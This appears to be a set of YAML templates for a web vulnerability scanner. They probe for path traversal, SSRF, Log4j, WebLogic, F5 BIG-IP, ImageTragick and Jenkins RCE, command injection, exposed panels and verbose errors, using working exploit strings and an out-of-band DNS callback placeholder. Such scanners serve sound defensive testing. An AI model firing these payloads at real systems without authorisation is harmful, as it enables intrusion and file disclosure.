23 | - Widget Connector Macro - Velocity Template Injection
--------------------------------------------------------------------------------
/CVE-2019-5418.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - into:
3 | - 'HEADER_ACCEPT'
4 | - payload:
5 | - '../../../../../../../../../../etc/passwd{{'
6 | - method:
7 | - replace
8 | detect:
9 | - response:
10 | - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*'
11 | meta-info:
12 | - type: ptrav
13 | - threat: 80
14 | - tags:
15 | - Path Traversal
16 | - Arbitrary File Reading
17 | - Misconfiguration
18 | - Directory Listing
19 | - Insecure Direct Object References
20 | - Broken Access Control
21 | - OWASP
22 | - OWASP Top-10
23 | - A4:2010
24 | - A4:2013
25 | - A5:2017
26 | - CVE-2019-5418
27 | - File Content Disclosure on Rails
28 |
--------------------------------------------------------------------------------
/CVE-2019-8451.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: '/plugins/servlet/gadgets/makeRequest?url=http://127.0.0.1@DNS_MARKER/'
4 | headers:
5 | - Host: 127.0.0.1
6 | - X-Atlassian-Token: no-check
7 |
8 | detect:
9 | - oob:
10 | - dns
11 |
12 | meta-info:
13 | - type: ssrf
14 | - threat: 95
15 | - tags:
16 | - SSRF
17 | - CVE-2019-8451
18 |
--------------------------------------------------------------------------------
/CVE-2020-14882_WebLogic_RCE.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec('getent%20hosts%20DNS_MARKER');%22);"
4 |
5 | - method: 'GET'
6 | url: '/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://DNS_MARKER/test.xml");'
7 |
8 | detect:
9 | - oob:
10 | - dns
11 |
12 | meta-info:
13 | - type: rce
14 | - threat: 98
15 | - title: "Remote code execution in Oracle WebLogic Server (CVE-2020-14882)"
16 | - description: "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server."
17 | - additional: "For more information, see https://www.oracle.com/security-alerts/cpuoct2020.html"
18 | - applicable_for:
19 | - fast
20 | - scanner
21 | - tags:
22 | - RCE
23 | - CVE-2020-14882
24 | - Oracle WebLogic
25 |
--------------------------------------------------------------------------------
/CVE-2020-5902_F5_BIG-IP.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
4 |
5 | - method: 'GET'
6 | url: '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
7 |
8 | detect:
9 | - response:
10 | - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\\/[^:]*:\\/[^:]*'
11 | - body: '"output":"auth\suser\sadmin.*encrypted-password'
12 |
13 | meta-info:
14 | - title: "Remote Code Execution (RCE) vulnerability in F5 BIG-IP (CVE-2020-5902)"
15 | - description: "In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages."
16 | - additional: "For more information see https://support.f5.com/csp/article/K52145254"
17 | - type: rce
18 | - threat: 98
19 | - applicable_for:
20 | - fast
21 | - scanner
22 | - tags:
23 | - CVE-2020-5902
24 | - F5 BIG-IP
25 |
--------------------------------------------------------------------------------
/CVE-2021-44228_Log4j_rce.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | - '${jndi:ldap://DNS_MARKER}'
4 | - '${jndi:ldap://DNS_MARKER}/'
5 | - '${jndi:rmi://DNS_MARKER//}'
6 | - '${jndi:dns://DNS_MARKER}'
7 | - method:
8 | - replace
9 | detect:
10 | - oob:
11 | - dns
12 | meta-info:
13 | - title: "Log4j Remote Code Execution (CVE-2021-44228)"
14 | - description: 'Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property "log4j2.formatMsgNoLookups" to “true” or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false"'
15 | - applicable_for:
16 | - attack_rechecker
17 | - fast
18 | - threat: 95
19 | - type: rce
20 | - tags:
21 | - Java
22 | - log4j
23 | - CVE-2021-44228
24 | - CWE-502
25 | - CWE-400
26 | - CWE-20
27 |
--------------------------------------------------------------------------------
/CVE-2021-44228_Log4j_ssti.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | - '${jndi:ldap://DNS_MARKER}'
4 | - '${jndi:ldap://DNS_MARKER}/'
5 | - '${jndi:rmi://DNS_MARKER//}'
6 | - '${jndi:dns://DNS_MARKER}'
7 | - method:
8 | - replace
9 | detect:
10 | - oob:
11 | - dns
12 | meta-info:
13 | - title: "Log4j Remote Code Execution (CVE-2021-44228)"
14 | - description: 'Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property "log4j2.formatMsgNoLookups" to “true” or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false"'
15 | - applicable_for:
16 | - attack_rechecker
17 | - threat: 95
18 | - type: ssti
19 | - tags:
20 | - Java
21 | - log4j
22 | - CVE-2021-44228
23 | - CWE-502
24 | - CWE-400
25 | - CWE-20
26 |
--------------------------------------------------------------------------------
/ImageTragick.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - into: 'POST_MULTIPART_.*_FILE_value'
3 | - payload:
4 | - !!str |
5 | push graphic-context
6 | viewbox 0 0 640 480
7 | fill 'url(https://example.com/image.jpg"|getent hosts DNS_MARKER")'
8 | pop graphic-context
9 | - !!str |
10 |
11 |
13 |
19 | - !!str |
20 | push graphic-context
21 | viewbox 0 0 640 480
22 | fill 'url(http://DNS_MARKER/)'
23 | pop graphic-context
24 | detect:
25 | - oob:
26 | - dns
27 |
28 | meta-info:
29 | - type: rce
30 | - threat: 95
31 | - tags:
32 | - OS Commanding
33 | - ImageMagic
34 | - ImageTragick
35 | - CVE-2016-3714
36 | - CVE-2016-3718
37 |
--------------------------------------------------------------------------------
/Insecure-cross-domain-policy.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: '/crossdomain.xml'
4 |
5 | - method: GET
6 | url: '/clientaccesspolicy.xml'
7 |
8 | detect:
9 | - response:
10 | - body: 'Index of \/\.svn'
14 | - body: '\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d{6}Z'
15 |
16 | meta-info:
17 | - type: info
18 | - threat: 30
19 | - applicable_for:
20 | - fast
21 | - tags:
22 | - SVN Data Leak
23 | - Information Exposure
--------------------------------------------------------------------------------
/Sandbox-bypass-in-Jenkins.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@groovy.transform.ASTTest(value={%20Runtime.getRuntime().exec('getent%20hosts%20DNS_MARKER')%20})%0Aclass%20Person%20{}"
4 |
5 | detect:
6 | - oob:
7 | - dns
8 |
9 | meta-info:
10 | - type: rce
11 | - threat: 88
12 | - applicable_for:
13 | - fast
14 | - tags:
15 | - Jenkins
16 | - RCE
17 | - CVE-2019-1003000
--------------------------------------------------------------------------------
/Symfony-debug-panel.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: '/_profiler/empty/search/results'
4 |
5 | detect:
6 | - response:
7 | - body: 'Symfony Profiler<\/title>'
8 | - body: '<title>Profiler<\/title>'
9 | - body: '<!-- START of Symfony Web Debug Toolbar -->'
10 |
11 | meta-info:
12 | - type: info
13 | - threat: 67
14 | - applicable_for:
15 | - fast
16 | - tags:
17 | - Symfony Debug Toolbar
18 | - Symfony Profiler
--------------------------------------------------------------------------------
/Tango-REST-Misconfiguration.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: 'tango/console'
4 |
5 | - method: 'GET'
6 | url: 'tango/rest'
7 |
8 | detect:
9 | - response:
10 | - headers:
11 | - 'WWW-Authenticate': 'Basic realm="TangoREST"'
12 |
13 | meta-info:
14 | - type: info
15 | - threat: 25
16 | - applicable_for:
17 | - fast
18 | - scanner
19 | - tags:
20 | - TangoREST
21 | - Misconfiguration
--------------------------------------------------------------------------------
/apache-server-status.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: '/server-status'
4 |
5 | detect:
6 | - response:
7 | - body: "Apache Server Status for"
8 |
9 | meta-info:
10 | - type: info
11 | - threat: 20
12 | - applicable_for:
13 | - fast
14 | - tags:
15 | - Apache server status
16 | - Disclosure of technical information
17 | - CWE-200 Information Exposure
--------------------------------------------------------------------------------
/apache-tapestry.yaml:
--------------------------------------------------------------------------------
1 | collect:
2 | - uniq:
3 | - [ URI ]
4 | generate:
5 | - into: URI
6 | - payload:
7 | - assets/z
8 | - assets/z/
9 | - assets/app
10 | - assets/app/
11 | - method:
12 | - postfix
13 | detect:
14 | - response:
15 | - headers:
16 | - 'X-Tapestry-ErrorMessage': '.*'
17 | meta-info:
18 | - type: info
19 | - threat: 80
20 | - tags:
21 | - Infoleak
22 | - Apache Tapestry
--------------------------------------------------------------------------------
/apache-tomcat-misconfiguration.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: 'manager/html/'
4 |
5 | - method: 'GET'
6 | url: 'examples/'
7 |
8 | - method: 'GET'
9 | url: 'examples/jsp/'
10 |
11 | detect:
12 | - response:
13 | - body: '<title>JSP Examples<\/title>'
14 | - body: '<title>JSP 2.0 Examples'
15 | - body: '<title>Apache Tomcat Examples<\/title>'
16 | - headers:
17 | - 'WWW-Authenticate': 'Basic realm="Tomcat Manager Application"'
18 |
19 | meta-info:
20 | - type: info
21 | - threat: 25
22 | - applicable_for:
23 | - fast
24 | - scanner
25 | - tags:
26 | - Apache Tomcat
27 | - Misconfiguration
--------------------------------------------------------------------------------
/app-errors.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | - '%0D%0A%C1%81'
4 | - "%{1+'f'}"
5 |
6 | detect:
7 | - response:
8 | - body: 'Error Occurred While Processing Request'
9 | - body: "Server Error in '.*' Application"
10 | - body: 'Microsoft OLE DB Provider for ODBC Drivers error'
11 | - body: 'error in your SQL syntax'
12 | - body: 'Invalid Querystring'
13 | - body: 'Input string was not in a correct format'
14 | - body: 'An illegal character has been found in the statement'
15 | - body: 'ERROR:.*LINE [0-9]+:'
16 | - body: 'Warning:.+ Invalid multibyte sequence'
17 | - body: '<b>Fatal Error<\/b>: (.*)'
18 | - body: '<b>Notice<\/b>: (.*)'
19 | - body: "Warning stuff sybase stuff"
20 | - body: "Sybase stuff Server message stuff"
21 | - body: "Warning stuff sqlite"
22 | - body: 'SQLite\/JDBCDriver'
23 | - body: 'SQLite\.Exception'
24 | - body: 'System\.Data\.SQLite\.SQLiteException'
25 | - body: "PostgreSQL query failed:"
26 | - body: "supplied argument is not a valid PostgreSQL result"
27 | - body: "PostgreSQL.*ERROR"
28 | - body: "Warning stuff pg_ stuff"
29 | - body: "valid PostgreSQL result"
30 | - body: 'Npgsql\.stuff'
31 | - body: "PG::StuFError"
32 | - body: 'java\.sql\.SQLException'
33 | - body: "Oracle error"
34 | - body: "Oracle stuff Driver"
35 | - body: "Warning stuff oci_ stuff"
36 | - body: "Warning stuff ora_ stuff"
37 | - body: 'System\.Data\.OleDb\.OleDbException'
38 | - body: "ODBC SQL Server Driver"
39 | - body: "SQLServer JDBC Driver"
40 | - body: "SqlException"
41 | - body: 'System\.Data\.SqlClient\.SqlException'
42 | - body: "Unclosed quotation mark after the character string"
43 | - body: "Microsoft OLE DB Provider for ODBC Drivers"
44 | - body: "Microsoft OLE DB Provider for SQL Server"
45 | - body: "Incorrect syntax near"
46 | - body: "Sintaxis incorrecta cerca de"
47 | - body: "Syntax error in string in query expression"
48 | - body: "Procedure or function 'ColumnSeek' expects parameter"
49 | - body: "Unclosed quotation mark before the character string"
50 | - body: "Syntax Error (missing operator) in query expression"
51 | - body: "Data type mismatch in criteria expression"
52 | - body: 'ADODB\.Field \(0x800A0BCD\)'
53 | - body: "the used select statements have different number of columns"
54 | - body: "OLE DB stuff SQL Server"
55 | - body: "Warningstuff mssql"
56 | - body: "SQL error stuff POS(1234) stuff"
57 | - body: "Warning stuff maxdb stuff"
58 | - body: 'org\.hibernate\.QueryException: unexpected char:'
59 | - body: 'org\.hibernate\.QueryException: expecting'
60 | - body: "Unexpected end of command in statement"
61 | - body: "Warning stuff ingres_"
62 | - body: "Ingres SQLSTATE"
63 | - body: "Ingres stuff Driver"
64 | - body: 'com\.informix\.jdbc'
65 | - body: "Exception stuff Informix"
66 | - body: "Fatal error: Uncaught exception 'MongoCursorException'"
67 | - body: 'MS\.Internal\.Xml\.'
68 | - body: "error '80004005'"
69 | - body: 'Expression must evaluate to a node-set\.'
70 | - body: "A closing bracket expected in"
71 | - body: "An operand in Union Expression does not produce a node-set"
72 | - body: "Cannot convert expression to a number"
73 | - body: "Document Axis does not allow any context Location Steps"
74 | - body: "Empty Path Expression"
75 | - body: "Empty Relative Location Path"
76 | - body: "Empty Union Expression"
77 | - body: "Expected node test or name specification after axis operator"
78 | - body: "Incompatible XPath key"
79 | - body: "Incorrect Variable Binding"
80 | - body: 'A document must contain exactly one root element\.'
81 | - body: "XPathException"
82 | - body: "Unknown error in XPath"
83 | - body: 'org\.apache\.xpath\.XPath'
84 | - body: "libxml2 library function failed"
85 | - body: "xmlsec library function"
86 | - body: "xmlXPathEval: evaluation failed"
87 | - body: 'SimpleXMLElement::xpath\(\)'
88 | - body: "An error occurred in script"
89 | - body: 'Warning: include_once\(\): Failed opening'
90 | - body: "Failed opening required"
91 | - body: "failed to open stream: stuff"
92 | - body: 'MySqlClient\.'
93 | - body: "Server message"
94 | - body: "SQL error"
95 | - body: "JET Database Engine"
96 | - body: "Procedure or function"
97 | - body: '\[IBM\]\[CLI Driver\]\[DB2'
98 | - body: 'org\.postgresql\.util\.PSQLException'
99 | - body: "Access Database Engine"
100 | - body: "SQLiteException"
101 | - body: "CLI Driver"
102 | - body: "on MySQL result index"
103 | - body: "has occurred in the vicinity of:"
104 | - body: "MySQL server version for the right syntax to use"
105 | - body: 'com\.mysql\.jdbc\.exceptions'
106 | - body: "supplied argument is not a valid MySQL"
107 | - body: 'mssql_query\(\)'
108 | - body: 'mysql_fetch_array\(\)'
109 | - body: "Column count doesn't match value count at row"
110 | - body: "Sybase message"
111 | - body: "SQL Server"
112 | - body: "Dynamic SQL Error"
113 | - body: 'System\.Data\.SqlClient\.'
114 | - body: "DM_QUERY_E_SYNTAX"
115 | - body: 'pg_exec\(\)'
116 | - body: "SQLITE_ERROR"
117 | - body: "PostgreSQL"
118 | - body: 'org\.hsqldb\.jdbc'
119 | - body: "SQL syntax"
120 | - body: "Data type mismatch in criteria expression"
121 | - body: "DB2 SQL error"
122 | - body: "Sybase message:"
123 | - body: "in query expression"
124 | - body: "valid MySQL result"
125 | - body: "Column count doesn't match"
126 | - body: "ODBC Microsoft Access Driver"
127 | - body: 'Roadhouse\.Cms\.'
128 | - body: "DB2 SQL error:"
129 | - body: "No row with the given identifier"
130 | - body: "open_basedir restriction in effect"
131 | - body: "Cannot execute a blank command in"
132 | - body: "Fatal error: preg_replace"
133 | - body: "Stack trace:"
134 | - body: '\(\) cannot be called statically'
135 | - body: "- not a Class::Method"
136 | - body: '::__toString\(\) must not throw an exception'
137 | - body: "Access to undeclared static property:"
138 | - body: "An iterator cannot be used with foreach by reference"
139 | - body: "Array callback has to contain indices 0 and 1"
140 | - body: "Arrived at end of main loop which shouldn't happen"
141 | - body: "Attempt to destruct pending exception"
142 | - body: "Attempt to unset static property"
143 | - body: 'Balloc\(\) allocation exceeds list boundary'
144 | - body: 'Balloc\(\) failed to allocate memory'
145 | - body: "Base lambda function for closure not found"
146 | - body: "Call to a member function"
147 | - body: "Call to private"
148 | - body: "Call to protected"
149 | - body: "Call to undefined function"
150 | - body: "Call to undefined method"
151 | - body: "Can only throw objects"
152 | - body: "Cannot access empty property"
153 | - body: "Cannot access parent:: when current class scope has no parent"
154 | - body: "Cannot access parent:: when no class scope is active"
155 | - body: "Cannot access property started with"
156 | - body: "Cannot access self:: when no class scope is active"
157 | - body: "Cannot access static:: when no class scope is active"
158 | - body: "Cannot access undefined property for object with overloaded property access"
159 | - body: "Cannot assign by reference to overloaded object"
160 | - body: 'Cannot break\/continue'
161 | - body: "Cannot call abstract method"
162 | - body: "Cannot call constructor"
163 | - body: 'Cannot call forward_static_call\(\) when no class scope is active'
164 | - body: "Cannot call non static method"
165 | - body: "Cannot call overloaded function for non-object"
166 | - body: "Cannot call private"
167 | - body: 'Cannot create references to\/from string offsets'
168 | - body: 'Cannot create references to\/from string offsets nor overloaded objects'
169 | - body: "Cannot declare self-referencing constant"
170 | - body: "Cannot destroy active lambda function"
171 | - body: "Cannot get arguments for"
172 | - body: 'Cannot increment\/decrement overloaded objects nor string offsets'
173 | - body: "Cannot instantiate abstract class"
174 | - body: "Cannot instantiate interface"
175 | - body: "Cannot instantiate trait"
176 | - body: "Cannot override final"
177 | - body: "Cannot pass parameter"
178 | - body: "Cannot redeclare"
179 | - body: "Cannot redeclare class"
180 | - body: "Cannot register a reverse output handler conflict outside of MINIT"
181 | - body: "Cannot register an output handler alias outside of MINIT"
182 | - body: "Cannot register an output handler conflict outside of MINIT"
183 | - body: "Cannot resume an already running generator"
184 | - body: "Cannot return string offsets by reference"
185 | - body: "Cannot set non exception as previous exception"
186 | - body: "Cannot unset string offsets"
187 | - body: "Cannot use assign-op operators with overloaded objects nor string offsets"
188 | - body: "Cannot use object as array"
189 | - body: "Cannot use object of type"
190 | - body: "Cannot use string offset as an array"
191 | - body: "Cannot use string offset as an object"
192 | - body: "Cannot yield from finally in a force-closed generator"
193 | - body: "Cannot yield string offsets by reference"
194 | - body: "Class entry requested for an object without PHP class"
195 | - body: "Class name must be a valid object or a string"
196 | - body: 'Corrupted fcall_info provided to zend_call_function\(\)'
197 | - body: 'DCOM has been disabled by your administrator \[com\.allow_dcom=0\]'
198 | - body: "DateFormat class not defined"
199 | - body: "DateTimeInterface can't be implemented by user classes"
200 | - body: "EXTREMELY fatal error: jmpbuf unrecoverable; terminating"
201 | - body: "EXTREMELY fatal error: longjmp returned control; terminating"
202 | - body: "Encoding: Attribute"
203 | - body: "Encoding: Can't decode apache map, missing key"
204 | - body: "Encoding: Can't decode apache map, missing value"
205 | - body: "Encoding: Can't decode apache map, only Strings or Longs are allowd as keys"
206 | - body: "Encoding: Cannot find encoding"
207 | - body: "Encoding: Element"
208 | - body: "Encoding: Error calling from_xml callback"
209 | - body: "Encoding: Error calling to_xml callback"
210 | - body: "Encoding: External reference"
211 | - body: "Encoding: Internal Error"
212 | - body: "Encoding: Invalid timestamp"
213 | - body: "Encoding: SoapVar has no 'enc_type' property"
214 | - body: "Encoding: Unresolved reference"
215 | - body: "Encoding: Violation of encoding rules"
216 | - body: "Encoding: Violation of id and ref information items"
217 | - body: "Encoding: object has no"
218 | - body: "Encoding: string"
219 | - body: "Error installing signal handler for"
220 | - body: "Exception thrown without a stack frame"
221 | - body: "Exceptions must be valid objects derived from the Exception base class"
222 | - body: "Failed to clone SpoofChecker object"
223 | - body: "Failed to register IntlDateFormatter class"
224 | - body: "Failed to register MessageFormatter class"
225 | - body: "Failed to register NumberFormatter class"
226 | - body: "Failed to register ResourceBundle class"
227 | - body: "Field width %d is too long"
228 | - body: "First array member is not a valid class name or object"
229 | - body: "Function name must be a string"
230 | - body: "Illegal length modifier specified"
231 | - body: "Illegal offset type"
232 | - body: "Input string is too long"
233 | - body: "Invalid RelaxNG Validation Context"
234 | - body: "Invalid Schema Validation Context"
235 | - body: "Invalid opcode"
236 | - body: "Invalid serialization data for DatePeriod object"
237 | - body: "Invalid serialization data for DateTime object"
238 | - body: "Invalid serialization data for DateTimeImmutable object"
239 | - body: "Maximum execution time of"
240 | - body: "Method name must be a string"
241 | - body: "Need to supply an object when throwing an exception"
242 | - body: "Nesting level too deep - recursive dependency"
243 | - body: "NumberFormatter class not defined"
244 | - body: "Object does not support method calls"
245 | - body: "Only variables can be passed by reference"
246 | - body: "PDO: driver"
247 | - body: "Parsing Schema: attribute"
248 | - body: "Parsing Schema: attributeGroup"
249 | - body: "Parsing Schema: can't import schema from"
250 | - body: "Parsing Schema: complexType has no 'name' attribute"
251 | - body: "Parsing Schema: element has both"
252 | - body: "Parsing Schema: element has no 'name' nor 'ref' attributes"
253 | - body: "Parsing Schema: expected"
254 | - body: "Parsing Schema: extension has no 'base' attribute"
255 | - body: "Parsing Schema: group has both 'ref' attribute and subcontent"
256 | - body: "Parsing Schema: group has no 'name' nor 'ref' attributes"
257 | - body: "Parsing Schema: include has no 'schemaLocation' attribute"
258 | - body: "Parsing Schema: missing restriction value"
259 | - body: "Parsing Schema: redefine has no 'schemaLocation' attribute"
260 | - body: "Parsing Schema: restriction has no 'base' attribute"
261 | - body: "Parsing Schema: simpleType has no 'name' attribute"
262 | - body: "Parsing Schema: unexpected"
263 | - body: "Parsing Schema: unresolved"
264 | - body: "has no name attribute"
265 | - body: 'Parsing WSDL: Could not find any usable binding services in WSDL\.'
266 | - body: "Parsing WSDL: Couldn't bind to service"
267 | - body: "Parsing WSDL: Couldn't find"
268 | - body: "Parsing WSDL: Couldn't load from"
269 | - body: "Parsing WSDL: Missing 'name' attribute for"
270 | - body: "Parsing WSDL: Missing 'type' attribute for"
271 | - body: "Parsing WSDL: Missing message attribute for"
272 | - body: "Parsing WSDL: Missing name for"
273 | - body: "Parsing WSDL: Missing part '%s' in"
274 | - body: "Parsing WSDL: Missing part attribute for"
275 | - body: "Parsing WSDL: No element with name"
276 | - body: "Parsing WSDL: No address associated with"
277 | - body: "Parsing WSDL: No binding associated with"
278 | - body: "Parsing WSDL: No location associated with"
279 | - body: "Parsing WSDL: No name associated with"
280 | - body: "Parsing WSDL: The fault message"
281 | - body: "Parsing WSDL: Unexpected WSDL element"
282 | - body: "Parsing WSDL: Unexpected extensibility element"
283 | - body: "Parsing WSDL: Unknown encodingStyle"
284 | - body: "Parsing WSDL: Unknown required WSDL extension"
285 | - body: "Parsing WSDL: Unspecified encodingStyle"
286 | - body: "Possible integer overflow in memory allocation"
287 | - body: "Second array member is not a valid method"
288 | - body: "Spoofchecker class not defined"
289 | - body: "String size overflow"
290 | - body: "The object to be iterated is in an invalid state:"
291 | - body: "Trying to clone an uncloneable object"
292 | - body: "Trying to clone an uncloneable object of class"
293 | - body: "Unable to call"
294 | - body: "Unable to cast node to string"
295 | - body: "Undefined class constant"
296 | - body: "Undefined constant"
297 | - body: "Undefined offset for object of type"
298 | - body: 'Unexpected inconsistency in create_function\(\)'
299 | - body: "Unknown SOAP version"
300 | - body: "Unknown typehint"
301 | - body: "Unsupported operand types"
302 | - body: "Using $this when not in object context"
303 | - body: "Wrong parameters for ErrorException"
304 | - body: "Wrong parameters for Exception"
305 | - body: "You MUST load PDO before loading any PDO drivers"
306 | - body: "operator not supported for strings"
307 | - body: "and must therefore be declared abstract or implement the remaining methods"
308 | - body: "namespace must not match the enclosing schema 'targetNamespace'"
309 | - body: "requires PDO API version"
310 | - body: 'class java\.lang\.'
311 | - body: 'java\.lang\.NullPointerException'
312 | - body: 'java\.rmi\.ServerException'
313 | - body: 'at java\.lang\.'
314 | - body: 'at org\.apache\.catalina'
315 | - body: 'at org\.apache\.coyote\.'
316 | - body: 'at org\.apache\.tomcat\.'
317 | - body: 'at org\.apache\.jasper\.'
318 | - body: "Microsoft VBScript runtime"
319 | - body: "Application uses a value of the wrong type for the current operation"
320 | - body: "Microsoft VBScript compilation"
321 | - body: 'Microsoft \.NET Framework Version:'
322 | - body: 'A trappable error occurred in an external object\. The script cannot continue running'
323 | - body: "Microsoft VBScript runtime Error"
324 | - body: 'ADODB\.Command'
325 | - body: "Object required:"
326 | - body: 'eval\(\).d code on line'
327 | - body: "Encoding: '*' may only be first arraySize value in list"
328 | - body: 'Warning: fopen\('
329 | - body: 'Warning: fpassthru\('
330 | - body: 'Warning.*include_once\(\): Failed opening'
331 | - body: 'Warning.*include_once\(.*\): failed to'
332 | - body: 'Warning.*include\(\): Failed opening'
333 | - body: 'Warning.*include\(.*\): failed to'
334 | - body: 'java\.lang\.IllegalArgumentException'
335 | - body: 'Request processing failed'
336 | - body: 'org\.springframework\.jdbc\.BadSqlGrammarException:'
337 | - body: 'java\.sql\.SQLSyntaxErrorException:'
338 | - body: '<\/b> on line <b>(.*)'
339 | - body: '<b>Warning<\/b>: (.*)'
340 | - body: 'no such function'
341 |
342 | meta-info:
343 | - type: info
344 | - threat: 30
345 | - tags:
346 | - Application Errors
347 | - OWASP Top 10
348 | - OWASP
349 |
--------------------------------------------------------------------------------
/bak-files.yaml:
--------------------------------------------------------------------------------
1 | collect:
2 | - uniq:
3 | - [ACTION_NAME]
4 | match:
5 | - ACTION_EXT: ".*" # any file extension like /filename\..*/
6 | generate:
7 | - payload:
8 | - .bak
9 | - .old
10 | - .tmp
11 | - into: URI
12 | - method:
13 | - postfix
14 | detect:
15 | - response:
16 | - headers:
17 | - 'Content-Type': '!(html|json|xml)'
18 | meta-info:
19 | - type: idor
20 | - threat: 60
21 | - tags:
22 | - Temporary Files
23 | - Source Code Disclosure
24 | - Misconfiguration
25 | - Insecure Direct Object References
26 | - Broken Access Control
27 | - OWASP
28 | - OWASP Top-10
29 | - A4:2010
30 | - A4:2013
31 | - A5:2017
32 |
--------------------------------------------------------------------------------
/command-injection-linux.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | #For QUICK scan profile. DNS_MARKER & CALC_MARKER.
4 | - ";getent hosts DNS_MARKER;echo $((CALC_MARKER));"
5 | - ";getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER));"
6 | - "';getent hosts DNS_MARKER;echo $((CALC_MARKER));'"
7 | - "';getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER));'"
8 | - "\";geten host DNS_MARKER;echo $((CALC_MARKER));\""
9 | - "\";getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER));\""
10 | - "`getent hosts DNS_MARKER;echo $((CALC_MARKER))`"
11 | - "`getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER))`"
12 | - "|getent hosts DNS_MARKER;echo $((CALC_MARKER))"
13 | - "|getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER))"
14 | - "x\ngentent hosts DNS_MARKER;echo $((CALC_MARKER))\nx"
15 | - "x\ngentent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER))\nx"
16 | - "$(getent hosts DNS_MARKER;ping -c1 DNS_MARKER)"
17 | - "$(getent$IFS$9hosts$IFS$9DNS_MARKER)"
18 |
19 | #For INTENSIVE scan profile. May be useful for the limited size of the parameter or WAF bypass.
20 | #CALC_MARKER
21 | #- ";echo $((CALC_MARKER));"
22 | #- ";echo$IFS$9$((CALC_MARKER));"
23 | #- "';echo $((CALC_MARKER));'"
24 | #- "';echo$IFS$9$((CALC_MARKER));'"
25 | #- "\";echo $((CALC_MARKER));\""
26 | #- "\";echo$IFS$9$((CALC_MARKER));\""
27 | #- "`echo $((CALC_MARKER))`"
28 | #- "`echo$IFS$9$((CALC_MARKER))`"
29 | #- "|echo $((CALC_MARKER))"
30 | #- "|echo$IFS$9$((CALC_MARKER))"
31 | #- "x\necho$IFS$9$((CALC_MARKER))\nx"
32 |
33 | #getent hosts DNS_MARKER
34 | #- ";getent hosts DNS_MARKER;"
35 | #- ";getent$IFS$9hosts$IFS$9DNS_MARKER;"
36 | #- "';getent hosts DNS_MARKER;'"
37 | #- "';getent$IFS$9hosts$IFS$9DNS_MARKER;'"
38 | #- "\";getent hosts DNS_MARKER;\""
39 | #- "\";getent$IFS$9hosts$IFS$9DNS_MARKER;\""
40 | #- "`getent hosts DNS_MARKER`"
